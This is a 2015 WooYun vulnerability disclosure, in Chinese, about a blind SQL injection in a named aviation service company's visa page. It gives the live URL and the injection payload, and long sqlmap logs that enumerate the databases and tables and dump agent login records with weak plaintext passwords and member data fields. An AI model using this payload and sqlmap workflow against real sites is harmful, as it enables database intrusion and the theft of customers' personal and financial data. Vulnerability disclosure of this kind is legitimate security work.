当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111591

漏洞标题:北京某航空服务有限公司签证服务详细信息页面存在布尔盲注(导致用户个人信息数据泄露)

相关厂商:北京海华航空服务有限公司

漏洞作者: 帅克笛枫

提交时间:2015-05-02 07:04

修复时间:2015-06-20 18:46

公开时间:2015-06-20 18:46

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-02: 细节已通知厂商并且等待厂商处理中
2015-05-06: 厂商已经确认,细节仅向厂商公开
2015-05-16: 细节向核心白帽子及相关领域专家公开
2015-05-26: 细节向普通白帽子公开
2015-06-05: 细节向实习白帽子公开
2015-06-20: 细节向公众公开

简要描述:

北京某航空服务有限公司签证服务详细信息页面存在布尔盲注,导致用户个人信息数据泄露(包含注册用户的银行卡账号内余额数量,管理员及注册用户账号密码,B2B代理商账号密码,机票订单支付记录等详细信息)
嗯,吶,我们曾在田野里歌唱,在冬季盼望,却没能等到阳光下这秋天的景象,就让失散的誓言飞舞吧~~

详细说明:

北京海华航空服务有限公司签证服务详细信息页面存在布尔值盲注,导致用户个人信息数据泄露(包含注册用户的银行卡账号内余额数量,管理员及注册用户账号密码,B2B代理商账号密码,机票订单支付记录等详细信息)
打开网址:http://www.h-h.com.cn/visa/view_visa.aspx?id=17,查看签证服务信息,如图所示:

qz1.png

,将北京海华航空服务有限公司签证服务详细信息页面url放入sqlmap检测,如图所示:

qz2.png

,直接查看到当前的6个数据库,
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 00:33:38
[00:33:38] [INFO] resuming back-end DBMS 'microsoft sql server'
[00:33:38] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requ
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=17 AND 2620=2620
---
[00:33:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[00:33:39] [INFO] fetching database names
[00:33:39] [INFO] fetching number of databases
[00:33:39] [INFO] resumed: 6
[00:33:39] [INFO] resumed: AgentDB
[00:33:39] [INFO] resumed: haihua_pek
[00:33:39] [INFO] resumed: master
[00:33:39] [INFO] resumed: model
[00:33:39] [INFO] resumed: msdb
[00:33:39] [INFO] resumed: tempdb
available databases [6]:
[*] AgentDB
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] tempdb
查看当前数据库及权限,如图所示:

qz15.png

列出haihua_pek数据库中的所有表,如图所示:

qz4.png

[07:19:21] [INFO] resumed: dbo.Hotel_StaticInfos
[07:19:21] [INFO] resumed: dbo.huoche
[07:19:21] [INFO] resumed: dbo.Inuoice
[07:19:21] [INFO] resumed: dbo.jbitem
[07:19:21] [INFO] resumed: dbo.jp_detail
[07:19:21] [INFO] resumed: dbo.jp_line
[07:19:21] [INFO] resumed: dbo.kefu
[07:19:21] [INFO] resumed: dbo.kefu_files
[07:19:21] [INFO] resumed: dbo.kefu_mail
[07:19:21] [INFO] resumed: dbo.kefubm
[07:19:21] [INFO] resumed: dbo.kq_history
[07:19:21] [INFO] resumed: dbo.kq_items
[07:19:21] [INFO] resumed: dbo.ldt_history
[07:19:21] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[07:19:21] [INFO] retrieved:
[07:19:21] [WARNING] reflective value(s) found and filtering out
dbo.link
[07:19:39] [INFO] retrieved: dbo.lu_items
[07:20:02] [INFO] retrieved: dbo.lv_items_mb
[07:20:33] [INFO] retrieved: dbo.lv_orders_mx
[07:21:07] [INFO] retrieved: dbo.lv@scl@ss
[07:21:29] [INFO] retrieved: dbo.member
[07:21:45] [INFO] retrieved: dbo.member_sales
[07:22:12] [INFO] retrieved: dbo.member_sales_his
[07:22:54] [INFO] retrieved: dbo.member_table
[07:23:24] [INFO] retrieved: dbo.member_yu
[07:23:48] [INFO] retrieved: dbo.menu_b
[07:24:06] [INFO] retrieved: dbo.menu_s
[07:24:26] [INFO] retrieved: dbo.message_mb
[07:24:52] [INFO] retrieved: dbo.money_mx
[07:25:17] [INFO] retrieved: dbo.money_other
[07:25:48] [INFO] retrieved: dbo.MybunkMessage
[07:26:25] [INFO] retrieved: dbo.neus_read
[07:26:52] [INFO] retrieved: dbo.Notebook
[07:27:17] [INFO] retrieved: dbo.oa_item
[07:27:37] [INFO] retrieved: dbo.oa_main
[07:28:00] [INFO] retrieved: dbo.ordersPdesign
[07:28:35] [INFO] retrieved: dbo.otherclass
[07:29:01] [INFO] retrieved: dbo.OtherParm
[07:29:37] [INFO] retrieved: dbo.pay_money
[07:30:01] [INFO] retrieved: dbo.pay_money_main
[07:30:36] [INFO] retrieved: dbo.pay_money_other
[07:31:15] [INFO] retrieved: dbo.payfs
[07:31:31] [INFO] retrieved: dbo.PayOut
[07:31:49] [INFO] retrieved: dbo.piaobei
[07:32:12] [INFO] retrieved: dbo.piaodian
[07:32:34] [INFO] retrieved: dbo.piaodian_yu
[07:33:05] [INFO] retrieved: dbo.plane_uinhao
[07:33:37] [INFO] retrieved: dbo.pnr
[07:33:49] [INFO] retrieved: dbo.pnr_history
[07:34:23] [INFO] retrieved: dbo.pnrdetail
[07:34:47] [INFO] retrieved: dbo.postMain
[07:35:09] [INFO] retrieved: dbo.po`tRe
[07:35:27] [INFO] retrieved: dbo.ptype_set
[07:35:54] [INFO] retrieved: dbo.Report_mb
[07:36:22] [INFO] retrieved: dbo.Report_mb_member
[07:37:01] [INFO] retrieved: dbo.resms
[07:37:22] [INFO] retrieved: dbo.Roles
[07:37:38] [INFO] retrieved: dbo.Roles_flag
[07:38:07] [INFO] retrieved: dbo.room
[07:38:21] [INFO] retrieved: dbo.sahestable
[07:38:48] [INFO] retrieved: dbo.sfk_submit
[07:39:15] [INFO] retrieved: dbo.sfj_submit_mu
[07:39:48] [INFO] retrieved: dbo.sfkmx_other_uiew
[07:40:27] [INFO] retrieved: dbo.sfkmx_uiew
[07:40:53] [INFO] retrieved: dbo.shop_bigclass
[07:41:25] [INFO] retrieved: dbo.shnp_order
[07:41:52] [INFO] retrieved: dbo.shop_product
[07:42:24] [INFO] retrieved: dbo.shop_smallclass
[07:43:04] [INFO] retrieved: dbo.sms
[07:43:15] [INFO] retrieved: dbo.smr_key
[07:43:38] [INFO] retrieved: dbo.soupiaoren
[07:44:05] [INFO] retrieved: dbo.sys_nat
[07:44:25] [INFO] retrieved: dbo.System_info
[07:44:57] [INFO] retrieved: dbo.system_tx
[07:45:22] [INFO] retrieved: dbo.System_Warn
[07:45:51] [INFO] retrieved: dbo.tourbig
[07:46:11] [INFO] retrieved: dbo.tourclass
[07:46:37] [INFO] retrieved: dbo.tourday
[07:46:57] [INFO] retrieved: dbo.tourline
[07:47:24] [INFO] retrieved: dbo.tourlist
[07:47:46] [INFO] retrieved: dbo.tourneus
[07:48:08] [INFO] retrieved: dbo.tourorder
[07:48:33] [INFO] retrieved: dbo.Tplanetype
[07:48:59] [INFO] retrieved: dbo.traininfo
[07:49:24] [INFO] retrieved: dbo.trauel_item
[07:49:59] [INFO] retrieved: dbo.trauel_money
[07:50:29] [INFO] retrieved: dbo.trauel_order
[07:51:00] [INFO] retrieved: dbo trauel_order_detail
[07:51:53] [INFO] retrieved: dbo.tuipiao
[07:52:17] [INFO] retrieved: dbo.vieu_cu
[07:52:36] [INFO] retrieved: dbo.vieu_hctuipiao
[07:53:11] [INFO] retrieved: dbo.vieu_js
[07:53:31] [INFO] retrieved: dbo.vieu_kefu
[07:53:55] [INFO] retrieved: dbo.vieu_kq_history
[07:54:32] [INFO] retrieved: dbo.vieu_ldhistory
[07:55:06] [INFO] retrieved: dbo(vieu_member_yu
[07:55:41] [INFO] retrieved: dbo.vieu_pay_mx_main
[07:56:23] [INFO] retrieved: dbo.vieu_piaodian_yu
[07:57:04] [INFO] retrieved: dbo.vieu_scgq
[07:57:28] [INFO] retrieved: dbo,vieu_travel_order
[07:58:09] [INFO] retrieved: dbo-vieu_tuipiao
[07:58:45] [INFO] retrieved: dbo.vieubmpnr
[07:59:09] [INFO] retrieved: dbo.vieucjr
[07:59:29] [INFO] retrieved: dbo.vieugjticket
[08:00:03] [INFO] retrieved: dbo.vieuhc
[08:00:21] [INFO] retrieved: dbo.vieuother
[08:00:48] [INFO] retrieved: dbo.vieupnr
[08:01:08] [INFO] retrieved: dbo.Visor
[08:01:24] [INFO] retrieved: dbo.Wage_tab
[08:01:46] [INFO] retrieved: dbo.vtgroup
[08:02:06] [INFO] retrieved: dbo.vtOrderDetails
[08:02:40] [INFO] retrieved: dbo.vtOrders
[08:03:02] [INFO] retrieved: dbo.vttgclass
[08:03:29] [INFO] retrieved: dbo.vcd_ps_main
[08:03:58] [INFO] retrieved: dbo.yc_group
[08:04:19] [INFO] retrieved: dbo.yjbooks
[08:04:40] [INFO] retrieved: dbo.zc_class
[08:05:05] [INFO] retrieved: dbo.zc_list
[08:05:25] [INFO] retrieved: dbo.zclist
[08:05:43] [INFO] retrieved: dbo.zy@cla@s
[08:06:05] [INFO] retrieved: dbo.zy_zclist
Database: haihua_pek
[166 tables]
+---------------------------+
| [dbo ft_TAPrice] |
| [dbo trauel_order_detail] |
| [dbo(hide_flight] |
| [dbo(vieu_member_yu] |
| [dbo,Hotel_OrderInfo] |
| [dbo,vieu_travel_order] |
| [dbo-Hotel_PageSumInfo] |
| [dbo-vieu_tuipiao] |
| dbo.Airvays |
| dbo.Bank |
| dbo.CW_out |
| dbo.Hotel_City |
| dbo.Hotel_LandMarks |
| dbo.Hotel_SingleAvail |
| dbo.Hotel_StaticInfos |
| dbo.Inuoice |
| dbo.MybunkMessage |
| dbo.Notebook |
| dbo.OtherParm |
| dbo.PayOut |
| dbo.Report_mb |
| dbo.Report_mb_member |
| dbo.Roles |
| dbo.Roles_flag |
| dbo.System_Warn |
| dbo.System_info |
| dbo.Tplanetype |
| dbo.Visor |
| dbo.Wage_tab |
| dbo.[po`tRe] |
| dbo.admin |
| dbo.air |
| dbo.air_cab_class |
| dbo.aircity |
| dbo.airpiao |
| dbo.b2b_users |
| dbo.bm_login |
| dbo.books |
| dbo.bu_base |
| dbo.bu_product |
| dbo.cardnumjl |
| dbo.cgimg |
| dbo.cjr_login |
| dbo.cjrcard |
| dbo.company_bm |
| dbo.company_center |
| dbo.company_clk |
| dbo.company_flag |
| dbo.company_logo |
| dbo.company_news |
| dbo.company_sms |
| dbo.contact_info |
| dbo.cv_gd |
| dbo.cvkou |
| dbo.dbbak_history |
| dbo.fau_send |
| dbo.fau_submit |
| dbo.ft_City |
| dbo.ft_Config |
| dbo.gjqz |
| dbo.gjqz_f |
| dbo.gjticket |
| dbo.hccity |
| dbo.hcsheng |
| dbo.hcsite |
| dbo.hf_history |
| dbo.hotel |
| dbo.huoche |
| dbo.jbitem |
| dbo.jp_detail |
| dbo.jp_line |
| dbo.kefu |
| dbo.kefu_files |
| dbo.kefu_mail |
| dbo.kefubm |
| dbo.kq_history |
| dbo.kq_items |
| dbo.ldt_history |
| dbo.link |
| dbo.lu_items |
| dbo.lv@scl@ss |
| dbo.lv_items_mb |
| dbo.lv_orders_mx |
| dbo.member |
| dbo.member_sales |
| dbo.member_sales_his |
| dbo.member_table |
| dbo.member_yu |
| dbo.menu_b |
| dbo.menu_s |
| dbo.message_mb |
| dbo.money_mx |
| dbo.money_other |
| dbo.neus_read |
| dbo.oa_item |
| dbo.oa_main |
| dbo.ordersPdesign |
| dbo.otherclass |
| dbo.pay_money |
| dbo.pay_money_main |
| dbo.pay_money_other |
| dbo.payfs |
| dbo.piaobei |
| dbo.piaodian |
| dbo.piaodian_yu |
| dbo.plane_uinhao |
| dbo.pnr |
| dbo.pnr_history |
| dbo.pnrdetail |
| dbo.postMain |
| dbo.ptype_set |
| dbo.resms |
| dbo.room |
| dbo.sahestable |
| dbo.sfj_submit_mu |
| dbo.sfk_submit |
| dbo.sfkmx_other_uiew |
| dbo.sfkmx_uiew |
| dbo.shnp_order |
| dbo.shop_bigclass |
| dbo.shop_product |
| dbo.shop_smallclass |
| dbo.smr_key |
| dbo.sms |
| dbo.soupiaoren |
| dbo.sys_nat |
| dbo.system_tx |
| dbo.tourbig |
| dbo.tourclass |
| dbo.tourday |
| dbo.tourline |
| dbo.tourlist |
| dbo.tourneus |
| dbo.tourorder |
| dbo.traininfo |
| dbo.trauel_item |
| dbo.trauel_money |
| dbo.trauel_order |
| dbo.tuipiao |
| dbo.vcd_ps_main |
| dbo.vieu_cu |
| dbo.vieu_hctuipiao |
| dbo.vieu_js |
| dbo.vieu_kefu |
| dbo.vieu_kq_history |
| dbo.vieu_ldhistory |
| dbo.vieu_pay_mx_main |
| dbo.vieu_piaodian_yu |
| dbo.vieu_scgq |
| dbo.vieubmpnr |
| dbo.vieucjr |
| dbo.vieugjticket |
| dbo.vieuhc |
| dbo.vieuother |
| dbo.vieupnr |
| dbo.vtOrderDetails |
| dbo.vtOrders |
| dbo.vtgroup |
| dbo.vttgclass |
| dbo.yc_group |
| dbo.yjbooks |
| dbo.zc_class |
| dbo.zc_list |
| dbo.zclist |
| dbo.zy@cla@s |
| dbo.zy_zclist |
+---------------------------+
[08:06:29] [INFO] fetched data logged to text files under 'F:\x\SQLMAP~1\Bin\out
put\www.h-h.com.cn'
列出数据库中Bank表中的数据,如图所示:

qz9.png

qz10.png

,查看相关机票订单标的数据,如图所示:

qz13.png

漏洞证明:

qz14.png

,数据库可以看到b2b代理商及bm的login数据,如图所示:

qz13.png

qz14.png

[10:28:14] [INFO] fetching columns for table 'bm_login' in database 'haihua_
[10:28:14] [INFO] resumed: 6
[10:28:14] [INFO] resumed: bm
[10:28:14] [INFO] resumed: bmpwd
[10:28:14] [INFO] resumed: card
[10:28:14] [INFO] resumed: Memberid
[10:28:14] [INFO] resumed: name
[10:28:14] [INFO] resumed: username
[10:28:14] [INFO] fetching entries for table 'bm_login' in database 'haihua_
[10:28:14] [INFO] fetching number of entries for table 'bm_login' in databas
aihua_pek'
[10:28:14] [INFO] retrieved: 29
[10:28:17] [INFO] fetching number of distinct values for column 'bm'
[10:28:17] [INFO] retrieved: 29
[10:28:19] [INFO] using column 'bm' as a pivot for retrieving row data
[10:28:19] [INFO] retrieved: A
[10:28:32] [WARNING] cannot properly display Unicode characters inside Windo
S command prompt (http://bugs.python.org/issue1602). All unhandled occurance
ll result in replacement with '?' character. Please, find proper character r
sentation inside corresponding output files.
?
[10:28:34] [INFO] retrieved: TZSBJC
[10:28:45] [INFO] retrieved: GP ??????
[10:29:47] [INFO] retrieved:
[10:29:49] [WARNING] in case of continuous data retrieval problems you are a
ed to try a switch '--no-cast' and/or switch '--hex'
[10:29:49] [INFO] retrieved: 602
[10:29:56] [INFO] retrieved: TZSBJC
[10:30:08] [INFO] retrieved: B?
[10:30:21] [INFO] retrieved: TZSBJC
[10:30:33] [INFO] retrieved: GP ??????
[10:31:33] [INFO] retrieved:
[10:31:35] [INFO] retrieved: 602
[10:31:43] [INFO] retrieved: TZSBJC
[10:31:58] [INFO] retrieved: C?
[10:32:11] [INFO] retrieved: TZSBJC
[10:32:26] [INFO] retrieved: GP ??????
[10:33:28] [INFO] retrieved:
[10:33:30] [INFO] retrieved: 602
[10:33:37] [INFO] retrieved: TZSBJC
[10:33:49] [INFO] retrieved: D?
[10:34:02] [INFO] retrieved: TZSBJC
[10:34:14] [INFO] retrieved: GP ??????
[10:35:26] [INFO] retrieved:
[10:35:28] [INFO] retrieved: 602
[10:35:36] [INFO] retrieved: TZSBJC
[10:35:48] [INFO] retrieved: E?
[10:36:01] [INFO] retrieved: TZSBJC
[10:36:14] [INFO] retrieved: GP ??????
[10:37:15] [INFO] retrieved:
[10:37:17] [INFO] retrieved: 602
[10:37:24] [INFO] retrieved: TZSBJC
[10:37:38] [INFO] retrieved: sl
[10:37:44] [INFO] retrieved: GAH
[10:37:51] [INFO] retrieved: ???
[10:38:21] [INFO] retrieved: 123456
[10:38:34] [INFO] retrieved: 41
[10:38:40] [INFO] retrieved: GAH
[10:38:47] [INFO] retrieved: TTYY
[10:38:57] [INFO] retrieved: GAH
[10:39:04] [INFO] retrieved: ???
[10:39:34] [INFO] retrieved:
[10:39:36] [INFO] retrieved: 41
[10:39:42] [INFO] retrieved: GAH
[10:39:49] [INFO] retrieved: wwwwtt
[10:40:03] [INFO] retrieved: SHKJYJY
[10:40:17] [INFO] retrieved: (??)?????????
[10:42:06] [INFO] retrieved:
[10:42:08] [INFO] retrieved: 3
[10:42:11] [INFO] retrieved: SHKJYJY
[10:42:29] [INFO] retrieved: ?????
[10:43:17] [INFO] retrieved: SHKJYJY
[10:43:31] [INFO] retrieved: (??)?????????
[10:45:11] [INFO] retrieved:
[10:45:13] [INFO] retrieved: 3
[10:45:16] [INFO] retrieved: SHKJYJY
[10:45:34] [INFO] retrieved: ???
[10:46:02] [INFO] retrieved: XZLZW
[10:46:13] [INFO] retrieved: ???
[10:46:42] [INFO] retrieved:
[10:46:44] [INFO] retrieved: 33
[10:46:49] [INFO] retrieved: XZLZW
[10:46:59] [INFO] retrieved: ???????
[10:48:12] [INFO] retrieved: SHKJYJY
[10:48:27] [INFO] retrieved: (??)?????????
[10:50:23] [INFO] retrieved:
[10:50:25] [INFO] retrieved: 3
[10:50:29] [INFO] retrieved: SHKJYJY
[10:50:50] [INFO] retrieved: ????
[10:51:31] [INFO] retrieved: QYSD
[10:51:40] [INFO] retrieved: (??)????
[10:52:32] [INFO] retrieved:
[10:52:34] [INFO] retrieved: 66
[10:52:39] [INFO] retrieved: QYSD
[10:52:47] [INFO] retrieved: ????????
[10:53:54] [INFO] retrieved: YSXY
[10:54:03] [INFO] retrieved: GP ??????
[10:55:13] [INFO] retrieved:
[10:55:15] [INFO] retrieved: 118
[10:55:22] [INFO] retrieved: YSXY
[10:55:31] [INFO] retrieved: ???
[10:56:02] [INFO] retrieved: 21SJYCGL
[10:56:19] [INFO] retrieved: GP 21?????/???
[10:57:43] [INFO] retrieved: 123456
[10:57:55] [INFO] retrieved: 175
[10:58:03] [INFO] retrieved: 21SJYCGL
[10:58:20] [INFO] retrieved: ??????
[10:59:20] [INFO] retrieved: HZM
[10:59:31] [INFO] retrieved: ???
[11:00:06] [INFO] retrieved:
[11:00:08] [INFO] retrieved: 5
[11:00:11] [INFO] retrieved: HZM
[11:00:19] [INFO] retrieved: ????????
[11:02:09] [INFO] retrieved: SHKJYJY
[11:02:23] [INFO] retrieved: (??)?????????
[11:04:08] [INFO] retrieved:
[11:04:10] [INFO] retrieved: 3
[11:04:14] [INFO] retrieved: SHKJYJY
[11:04:28] [INFO] retrieved: ??????
[11:05:22] [INFO] retrieved: YSXY
[11:05:31] [INFO] retrieved: GP ??????
[11:06:32] [INFO] retrieved:
[11:06:34] [INFO] retrieved: 118
[11:06:41] [INFO] retrieved: YSXY
[11:06:50] [INFO] retrieved: ?????
[11:07:37] [INFO] retrieved: SHKJYJY
[11:07:52] [INFO] retrieved: (??)?????????
[11:09:38] [INFO] retrieved:
[11:09:40] [INFO] retrieved: 3
[11:09:44] [INFO] retrieved: SHKJYJY
[11:09:57] [INFO] retrieved: ????
[11:10:32] [INFO] retrieved: LX
[11:10:41] [INFO] retrieved: ??
[11:11:02] [INFO] retrieved:
[11:11:04] [INFO] retrieved: 7
[11:11:08] [INFO] retrieved: LX
[11:11:12] [INFO] retrieved: ?????
[11:11:58] [INFO] retrieved: YSXY
[11:12:08] [INFO] retrieved: GP ??????
[11:13:08] [INFO] retrieved:
[11:13:10] [INFO] retrieved: 118
[11:13:16] [INFO] retrieved: YSXY
[11:13:25] [INFO] retrieved: ?????
[11:14:09] [INFO] retrieved: SHKJYJY
[11:14:23] [INFO] retrieved: (??)?????????
[11:16:03] [INFO] retrieved:
[11:16:05] [INFO] retrieved: 3
[11:16:08] [INFO] retrieved: SHKJYJY
[11:16:22] [INFO] retrieved: ????
[11:17:02] [INFO] retrieved: QYSD
[11:17:11] [INFO] retrieved: (??)????
[11:18:11] [INFO] retrieved:
[11:18:12] [INFO] retrieved: 66
[11:18:18] [INFO] retrieved: QYSD
[11:18:31] [INFO] retrieved: ??
[11:18:52] [INFO] retrieved: YSXY
[11:19:01] [INFO] retrieved: GP ??????
[11:20:08] [INFO] retrieved:
[11:20:10] [INFO] retrieved: 118
[11:20:18] [INFO] retrieved: YSXY
[11:20:27] [INFO] retrieved: ?????
[11:21:15] [INFO] retrieved: SHKJYJY
[11:21:30] [INFO] retrieved: (??)?????????
[11:23:21] [INFO] retrieved:
[11:23:23] [INFO] retrieved: 3
[11:23:26] [INFO] retrieved: SHKJYJY
[11:23:41] [INFO] retrieved: ???
[11:24:13] [INFO] retrieved: SHKJYJY
[11:24:31] [INFO] retrieved: (??)?????????
[11:26:20] [INFO] retrieved:
[11:26:22] [INFO] retrieved: 3
[11:26:26] [INFO] retrieved: SHKJYJY
[11:26:41] [INFO] retrieved: ?????
[11:20:41] [INFO] retrieved: JKZDS
[11:20:52] [INFO] retrieved: GP ??????????
[11:22:37] [INFO] retrieved:
[11:22:39] [INFO] retrieved: 341
[11:22:46] [INFO] retrieved: JKZDS
[11:22:58] [INFO] retrieved: ???
[11:23:27] [INFO] retrieved: 21SJYCGL
[11:23:45] [INFO] retrieved: GP 21?????/???
[11:25:11] [INFO] retrieved: 123456
[11:25:24] [INFO] retrieved: 175
[11:25:32] [INFO] retrieved: 21SJYCGL
[11:25:49] [INFO] retrieved: ?????
[11:26:38] [INFO] retrieved: SHKJYJY
[11:26:53] [INFO] retrieved: (??)?????????
[11:28:40] [INFO] retrieved:
[11:28:42] [INFO] retrieved: 3
[11:28:46] [INFO] retrieved: SHKJYJY
[11:29:00] [INFO] retrieved: ???
[11:29:27] [INFO] retrieved: ZSJY
[11:29:38] [INFO] retrieved: (??)????
[11:30:35] [INFO] retrieved: 123456
[11:30:47] [INFO] retrieved: 2
[11:30:51] [INFO] retrieved: ZSJY
[11:31:00] [INFO] analyzing table dump for possible password hashes
Database: haihua_pek
Table: dbo.bm_login
[29 entries]
其中pay_money的相关支付信息数据,也可以查看到相应paybank和 paymoney,

qz16.png

qz17.png

相关旅馆信息,如图所示:

qz18.png

qz19.png


Database: haihua_pek
Table: dbo.hotel
[16 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| bed | int |
| c_name | nvarchar |
| card | ntext |
| casino | nvarchar |
| city | nvarchar |
| contactinfo | ntext |
| eatery | nvarchar |
| id | int |
| info | ntext |
| level | nvarchar |
| mainshow | int |
| picurl | nvarchar |
| picurl2 | nvarchar |
| picurl3 | nvarchar |
| services | nvarchar |
| zcprice | nvarchar |
+-------------+----------+
[00:47:02] [INFO] fetching columns for table 'hotel' in database 'haihua_pek'
[00:47:02] [INFO] resumed: 16
[00:47:02] [INFO] resumed: bed
[00:47:02] [INFO] resumed: c_name
[00:47:02] [INFO] resumed: card
[00:47:02] [INFO] resumed: casino
[00:47:02] [INFO] resumed: city
[00:47:02] [INFO] resumed: contactinfo
[00:47:02] [INFO] resumed: eatery
[00:47:02] [INFO] resumed: id
[00:47:02] [INFO] resumed: info
[00:47:02] [INFO] resumed: level
[00:47:02] [INFO] resumed: mainshow
[00:47:02] [INFO] resumed: picurl
[00:47:02] [INFO] resumed: picurl2
[00:47:02] [INFO] resumed: picurl3
[00:47:02] [INFO] resumed: services
[00:47:02] [INFO] resumed: zcprice
[00:47:02] [INFO] fetching entries for table 'hotel' in database 'haihua_pek'
[00:47:02] [INFO] fetching number of entries for table 'hotel' in database 'haih
ua_pek'
[00:47:02] [INFO] retrieved: 0
[00:47:04] [WARNING] table 'hotel' in database 'haihua_pek' appears to be empty
Database: haihua_pek
Table: dbo.hotel
[0 entries]
+----+-----+------+------+------+-------+--------+--------+--------+--------+---
------+---------+---------+----------+----------+-------------+
| id | bed | info | city | card | level | c_name | casino | eatery | picurl | pi
curl2 | picurl3 | zcprice | mainshow | services | contactinfo |
+----+-----+------+------+------+-------+--------+--------+--------+--------+---
------+---------+---------+----------+----------+-------------+
+----+-----+------+------+------+-------+--------+--------+--------+--------+---
------+---------+---------+----------+----------+-------------+
[00:47:04] [INFO] table 'haihua_pek.dbo.hotel' dumped to CSV file 'F:\x\SQLMAP~1
\Bin\output\www.h-h.com.cn\dump\haihua_pek\hotel.csv'
[00:47:04] [INFO] fetched data logged to text files under 'F:\x\SQLMAP~1\Bin\out
put\www.h-h.com.cn'
dbo.admin管理员账号信息,如图所示:

qz8.png

注册会员信息,如下所示:
Database: haihua_pek
Table: dbo.member
[42 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| address | nvarchar |
| api_mail | text |
| api_sms | text |
| birthday | nvarcdar |
| card | nvarchar |
| cardnum | int |
| cn_cardnum | float |
| content | text |
| fax | varchar |
| gjyhzc | float |
| gjzl | float |
| gnzl | float |
| int_cardnum | float |
| jsfs | varchar |
| jsfs_day | varchar |
| jycd | nvarchar |
| kefu | varchar |
| level | nvarchar |
| lsed | money |
| mail | nvarchar |
| Memberid | int |
| mobile | nvarchar |
| money | nvarchar |
| msn | nvarchar |
| name | varchar |
| phone | nvarchar |
| postcode | varchar |
| qq | nvarchar |
| regdate | datetime |
| sales | varchar |
| sfz | nvarchar |
| sh | int |
| UserAnswer | nvarchar |
| username | nvarchar |
| userpassword | nvarchar |
| UserQuesion | nvarchar |
| usersex | nvarchar |
| xyed | money |
| yhfs | int |
| yhzc | float |
| yumoney | money |
| ztype | nvarchar |
+--------------+----------+
[00:57:21] [INFO] fetched data logged to text files under 'F:\x\SQLMAP~1\Bin\out
put\www.h-h.com.cn'
Database: haihua_pek
Table: dbo.member_sales
[22 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| address | varchar |
| email | varchar |
| fax | varchar |
| fields1 | varchar |
| fields2 | varchar |
| fields3 | varchar |
| fields4 | varchar |
| fields5 | varchar |
| lxr | varchar |
| mail | varchar |
| Memberid | int |
| mobile | varchar |
| msn | varchar |
| name | varchar |
| phone | varchar |
| qq | varchar |
| regdate | datetime |
| remask | text |
| sales | varchar |
| username | varchar |
| visble | varchar |
| zt | varchar |
+----------+----------+
[01:09:31] [INFO] fetched data logged to text files under 'F:\x\SQLMAP~1\Bin\out
put\www.h-h.com.cn'

qz20.png


数据库中的表信息很多,跑了很长时间,只做部分列举。

修复方案:

过滤~~修复你们更专业~~

版权声明:转载请注明来源 帅克笛枫@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-05-06 18:44

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论